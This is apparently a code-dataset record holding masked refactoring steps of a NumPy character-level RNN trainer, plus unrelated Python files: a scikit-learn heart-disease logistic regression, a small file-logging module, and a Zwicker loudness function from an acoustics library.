"step-2": "<mask token>\nprint('chars: ', chars)\n<mask token>\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\n<mask token>\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = [mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-3": "<mask token>\ndata = open('input.txt', 'r').read()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('chars: ', chars)\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\niteration = 50000\nhidden_size = 100\nseq_length = 25\nlearning_rate = 0.1\nU = np.random.randn(hidden_size, vocab_size) * 0.01\nW = np.random.randn(hidden_size, hidden_size) * 0.01\nV = np.random.randn(vocab_size, hidden_size) * 0.01\nbh = np.zeros((hidden_size, 1))\nby = np.zeros((vocab_size, 1))\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by)\nsmooth_loss = -np.log(1.0 / vocab_size) * seq_length\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = [mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-4": "import numpy as np\ndata = open('input.txt', 'r').read()\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint('chars: ', chars)\nchar_to_ix = {ch: i for i, ch in enumerate(chars)}\nix_to_char = {i: ch for i, ch in enumerate(chars)}\niteration = 50000\nhidden_size = 100\nseq_length = 25\nlearning_rate = 0.1\nU = np.random.randn(hidden_size, vocab_size) * 0.01\nW = np.random.randn(hidden_size, hidden_size) * 0.01\nV = np.random.randn(vocab_size, hidden_size) * 0.01\nbh = np.zeros((hidden_size, 1))\nby = np.zeros((vocab_size, 1))\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by)\nsmooth_loss = -np.log(1.0 / vocab_size) * seq_length\nfor n in range(iteration):\n if p + seq_length + 1 >= len(data) or n == 0:\n hprev = np.zeros((hidden_size, 1))\n p = 0\n inputs = [char_to_ix[ch] for ch in data[p:p + seq_length]]\n targets = [char_to_ix[ch] for ch in data[p + 1:p + seq_length + 1]]\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001\n if n % 100 == 0:\n print(n, smooth_loss)\n param = [U, W, V, bh, by]\n dparam = [dU, dW, dV, dbh, dby]\n mem = [mU, mW, mV, mbh, mby]\n for i in range(len(param)):\n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-08)\n p += seq_length\n",
"step-5": "import numpy as np\n\n# data I/O\ndata = open('input.txt', 'r').read() # should be simple plain text file\nchars = list(set(data))\ndata_size, vocab_size = len(data), len(chars)\nprint(\"chars: \", chars)\n#one-hot encoding\nchar_to_ix = { ch:i for i,ch in enumerate(chars) }\nix_to_char = { i:ch for i,ch in enumerate(chars) }\n\niteration=50000\nhidden_size = 100 \nseq_length = 25\nlearning_rate = 1e-1\n\n# model parameters\nU = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden\nW = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden\nV = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output\nbh = np.zeros((hidden_size, 1)) # hidden bias\nby = np.zeros((vocab_size, 1)) # output bias\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n # forward pass\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size,1)) \n x[t][inputs[t]] = 1 # encode-1ofk representation \n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t-1]) + bh) \n temp=np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t],0]) # softmax (cross-entropy loss) for 1-of-k representaiton\n\n # backprop\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1 # backprop into y. http://cs231n.github.io/neural-networks-case-study/#grad\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext # backprop into h\n dhraw = (1 - h[t] * h[t]) * dh # backprop through tanh nonlinearity\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t-1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients\n return loss, dU, dW, dV, dbh, dby, h[len(inputs)-1]\n\nn, p = 0, 0\nmU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\nmbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad\nsmooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0\n\nfor n in range(iteration):\n if p+seq_length+1 >= len(data) or n == 0: \n hprev = np.zeros((hidden_size,1)) # reset RNN memory\n p = 0 \n inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]\n targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]\n\n loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)\n smooth_loss = smooth_loss * 0.999 + loss * 0.001 \n\n if n % 100 == 0: \n print (n,smooth_loss)\n\n # perform parameter update with Adagrad\n # for param, dparam, mem in zip([U, W, V, bh, by], \n # [dU, dW, dV, dbh, dby], \n # [mU, mW, mV, mbh, mby]):\n # mem += dparam * dparam\n # param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update\n\n param=[U, W, V, bh, by]\n dparam=[dU, dW, dV, dbh, dby]\n mem=[mU, mW, mV, mbh, mby]\n for i in range(len(param)): \n mem[i] += dparam[i] * dparam[i]\n param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-8) # adagrad update\n\n p += seq_length # move data pointer\n # n += 1 # iteration counter \n # if n>iteration:\n # print(\"done\")\n # sys.exit(0)\n\n\n\n\n\n\n\n\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# import libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
import math
from sklearn.model_selection import cross_validate
# read the csv file
dataset = pd.read_csv('heart.csv')
#copy the dataset
df = dataset.copy()
# make X and Y
X = df.drop(['target'], axis=1).values
Y = df.target.values
# correlation matrix
corr_mat = df.corr()
# split based on training and test dataset
x_train, x_test, y_train, y_test = \
    train_test_split(X, Y, test_size=0.3, random_state=1234, stratify=Y)
# Logistic regression
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
# accuracy score
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
# Cross validation
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl','wb'))
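
# --- Added sketch (not part of the original script): reloading the pickled classifier and
# --- scoring one held-out record. The feature order must match heart.csv minus 'target';
# --- x_test[0] is used here purely as an illustrative input row.
loaded_model = pickle.load(open('model.pkl', 'rb'))
sample_row = x_test[0].reshape(1, -1)  # a single patient record
print('predicted class  :', loaded_model.predict(sample_row)[0])
print('class probability:', loaded_model.predict_proba(sample_row)[0])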
|
flexible
|
{
"blob_id": "1508697f93114d7f20182a3e9c1df5617904529a",
"index": 8725,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlr.fit(x_train, y_train)\n<mask token>\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-3": "<mask token>\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-5": "# import libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\n\n\n# read the csv file\ndataset = pd.read_csv('heart.csv')\n\n#copy the dataset\ndf = dataset.copy()\n\n# make X and Y\nX = df.drop(['target'], axis=1).values\nY = df.target.values\n\n\n# correleation matrix\ncorr_mat = df.corr()\n\n\n# split based on training and test dataset\n\nx_train, x_test, y_train, y_test = \\\n train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)\n \n\n# Logistic regression\n\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\n\ny_predict = lr.predict(x_test)\n\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\n\n\n# accuracy score\n\nacc_score = accuracy_score(y_test, y_predict)\n\n\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\n\n\n# Cross validation\n\nlr_cross = LogisticRegression()\n\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\n\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\n\npickle.dump(lr, open('model.pkl','wb'))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
'''
log.py
version 1.0 - 18.03.2020
    Logging for multiple scenarios
'''
# Imports
import datetime
# Global variables
ERROR_FILE = "error.log"
LOG_FILE = "application.log"
def error(msg):
__log_internal(ERROR_FILE, msg)
def info(msg):
__log_internal(LOG_FILE, msg)
def __log_internal(filename, msg):
now = datetime.datetime.now()
f = open(filename, "a+")
f.write("{} : {}\n".format(now.strftime("%Y-%m-%d %H:%M:%S"), msg))
f.close()
if __name__ == '__main__':
print("Erstelle Testfiles")
info("Test")
error("Test")
|
normal
|
{
"blob_id": "0475c6cab353f0d23a4c4b7f78c1b47ecc5f8d3b",
"index": 4819,
"step-1": "<mask token>\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-3": "<mask token>\nERROR_FILE = 'error.log'\nLOG_FILE = 'application.log'\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-4": "<mask token>\nimport datetime\nERROR_FILE = 'error.log'\nLOG_FILE = 'application.log'\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, 'a+')\n f.write('{} : {}\\n'.format(now.strftime('%Y-%m-%d %H:%M:%S'), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print('Erstelle Testfiles')\n info('Test')\n error('Test')\n",
"step-5": "'''\n log.py\n\n version 1.0 - 18.03.2020\n\n Logging fuer mehrere Szenarien\n'''\n\n# Imports\nimport datetime\n\n# Globale Variablen\nERROR_FILE = \"error.log\"\nLOG_FILE = \"application.log\"\n\n\ndef error(msg):\n __log_internal(ERROR_FILE, msg)\n\n\ndef info(msg):\n __log_internal(LOG_FILE, msg)\n\n\ndef __log_internal(filename, msg):\n now = datetime.datetime.now()\n f = open(filename, \"a+\")\n f.write(\"{} : {}\\n\".format(now.strftime(\"%Y-%m-%d %H:%M:%S\"), msg))\n f.close()\n\n\nif __name__ == '__main__':\n print(\"Erstelle Testfiles\")\n info(\"Test\")\n error(\"Test\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
# Third party imports
import numpy as np
# Local application imports
from mosqito.sound_level_meter import noct_spectrum
from mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness
from mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes
from mosqito.utils.conversion import amp2db
# Optional package import
try:
from SciDataTool import DataTime, DataLinspace, DataFreq
except ImportError:
DataTime = None
DataLinspace = None
DataFreq = None
def loudness_zwst(signal, fs=None, field_type="free", is_sdt_output=False):
"""Zwicker-loudness calculation for stationary signals
Calculates the acoustic loudness according to Zwicker method for
stationary signals.
    Normative reference:
ISO 532:1975 (method B)
DIN 45631:1991
ISO 532-1:2017 (method 1)
    The code is based on the BASIC program published in "Program for
calculating loudness according to DIN 45631 (ISO 532B)", E.Zwicker
and H.Fastl, J.A.S.J (E) 12, 1 (1991).
Note that due to normative continuity, as defined in the
    preceding standards, the method is in accordance with
ISO 226:1987 equal loudness contours (instead of ISO 226:2003)
Parameters
----------
signal : numpy.array or DataTime object
Signal time values [Pa]
fs : float, optional
Sampling frequency, can be omitted if the input is a DataTime
object. Default to None
field_type : str
Type of soundfield corresponding to spec_third ("free" by
default or "diffuse").
is_sdt_output : Bool, optional
If True, the outputs are returned as SciDataTool objects.
Default to False
Outputs
-------
N : float or numpy.array
The overall loudness array [sones], size (Ntime,).
N_specific : numpy.ndarray or DataFreq object
The specific loudness array [sones/bark], size (Nbark, Ntime).
bark_axis: numpy.array
The Bark axis array, size (Nbark,).
"""
# Manage SciDataTool input type
if DataTime is not None and isinstance(signal, DataTime):
time = signal.get_along("time")["time"]
fs = 1 / (time[1] - time[0])
signal = signal.get_along("time")[signal.symbol]
# Compute third octave band spectrum
spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)
# Compute dB values
spec_third = amp2db(spec_third, ref=2e-5)
# Compute main loudness
Nm = _main_loudness(spec_third, field_type)
# Computation of specific loudness pattern and integration of overall
# loudness by attaching slopes towards higher frequencies
N, N_specific = _calc_slopes(Nm)
# Define Bark axis
bark_axis = np.linspace(0.1, 24, int(24 / 0.1))
# Manage SciDataTool output type
if is_sdt_output:
if DataLinspace is None:
raise RuntimeError(
"In order to handle Data objects you need the 'SciDataTool' package."
)
else:
bark_data = DataLinspace(
name="Critical band rate",
unit="Bark",
initial=0,
final=24,
number=int(24 / 0.1),
include_endpoint=True,
)
N_specific = DataFreq(
name="Specific loudness (Zwicker method for stationnary signal)",
symbol="N'_{zwst}",
axes=[bark_data],
values=N_specific,
unit="sone/Bark",
)
return N, N_specific, bark_axis
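

# --- Added usage sketch (not part of the original module): loudness of a synthetic 1 kHz
# --- pure tone. The amplitude (0.2 Pa RMS, roughly 80 dB SPL re 2e-5 Pa) and the 48 kHz
# --- sampling rate are illustrative assumptions, not values prescribed by the standard.
if __name__ == "__main__":
    fs = 48000
    t = np.arange(0, 1.0, 1 / fs)
    signal = 0.2 * np.sqrt(2) * np.sin(2 * np.pi * 1000 * t)  # 1 kHz tone, 0.2 Pa RMS
    N, N_specific, bark_axis = loudness_zwst(signal, fs, field_type="free")
    print("Overall loudness [sone]:", N)
    print("Specific loudness shape:", np.asarray(N_specific).shape,
          "over", len(bark_axis), "Bark bins")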
|
normal
|
{
"blob_id": "75716aaaca63f8ca6d32c885021c1dc0f9a12dac",
"index": 793,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-3": "<mask token>\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n bark_data = DataLinspace(name='Critical band rate', unit='Bark',\n initial=0, final=24, number=int(24 / 0.1), include_endpoint\n =True)\n N_specific = DataFreq(name=\n 'Specific loudness (Zwicker method for stationnary signal)',\n symbol=\"N'_{zwst}\", axes=[bark_data], values=N_specific,\n unit='sone/Bark')\n return N, N_specific, bark_axis\n",
"step-4": "import numpy as np\nfrom mosqito.sound_level_meter import noct_spectrum\nfrom mosqito.sq_metrics.loudness.loudness_zwst._main_loudness import _main_loudness\nfrom mosqito.sq_metrics.loudness.loudness_zwst._calc_slopes import _calc_slopes\nfrom mosqito.utils.conversion import amp2db\ntry:\n from SciDataTool import DataTime, DataLinspace, DataFreq\nexcept ImportError:\n DataTime = None\n DataLinspace = None\n DataFreq = None\n\n\ndef loudness_zwst(signal, fs=None, field_type='free', is_sdt_output=False):\n \"\"\"Zwicker-loudness calculation for stationary signals\n\n Calculates the acoustic loudness according to Zwicker method for\n stationary signals.\n Normatice reference:\n ISO 532:1975 (method B)\n DIN 45631:1991\n ISO 532-1:2017 (method 1)\n The code is based on BASIC program published in \"Program for\n calculating loudness according to DIN 45631 (ISO 532B)\", E.Zwicker\n and H.Fastl, J.A.S.J (E) 12, 1 (1991).\n Note that due to normative continuity, as defined in the\n preceeding standards, the method is in accordance with\n ISO 226:1987 equal loudness contours (instead of ISO 226:2003)\n\n Parameters\n ----------\n signal : numpy.array or DataTime object\n Signal time values [Pa]\n fs : float, optional\n Sampling frequency, can be omitted if the input is a DataTime\n object. Default to None\n field_type : str\n Type of soundfield corresponding to spec_third (\"free\" by\n default or \"diffuse\").\n is_sdt_output : Bool, optional\n If True, the outputs are returned as SciDataTool objects.\n Default to False\n\n Outputs\n -------\n N : float or numpy.array\n The overall loudness array [sones], size (Ntime,).\n N_specific : numpy.ndarray or DataFreq object\n The specific loudness array [sones/bark], size (Nbark, Ntime).\n bark_axis: numpy.array\n The Bark axis array, size (Nbark,).\n \"\"\"\n if DataTime is not None and isinstance(signal, DataTime):\n time = signal.get_along('time')['time']\n fs = 1 / (time[1] - time[0])\n signal = signal.get_along('time')[signal.symbol]\n spec_third, _ = noct_spectrum(signal, fs, fmin=24, fmax=12600)\n spec_third = amp2db(spec_third, ref=2e-05)\n Nm = _main_loudness(spec_third, field_type)\n N, N_specific = _calc_slopes(Nm)\n bark_axis = np.linspace(0.1, 24, int(24 / 0.1))\n if is_sdt_output:\n if DataLinspace is None:\n raise RuntimeError(\n \"In order to handle Data objects you need the 'SciDataTool' package.\"\n )\n else:\n 